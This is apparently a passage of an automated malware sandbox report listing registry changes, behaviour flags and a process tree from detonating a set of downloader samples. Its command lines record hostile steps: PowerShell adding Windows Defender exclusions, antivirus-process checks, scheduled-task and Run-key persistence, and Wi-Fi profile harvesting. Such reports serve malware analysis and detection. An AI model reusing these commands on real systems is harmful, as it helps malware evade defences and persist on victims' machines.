| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "2145" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "901" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "1006" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe'
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"
C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp" /SL5="$10446,3312183,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
"C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 33988
C:\Windows\SysWOW64\findstr.exe
findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w
C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com
Paintball.com w
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
C:\Windows\system32\reg.exe
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe
"C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe
"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"
C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfc29cc40,0x7ffdfc29cc4c,0x7ffdfc29cc58
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --disable-http2 --use-spdy=off --disable-quic
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2068 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=2144 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
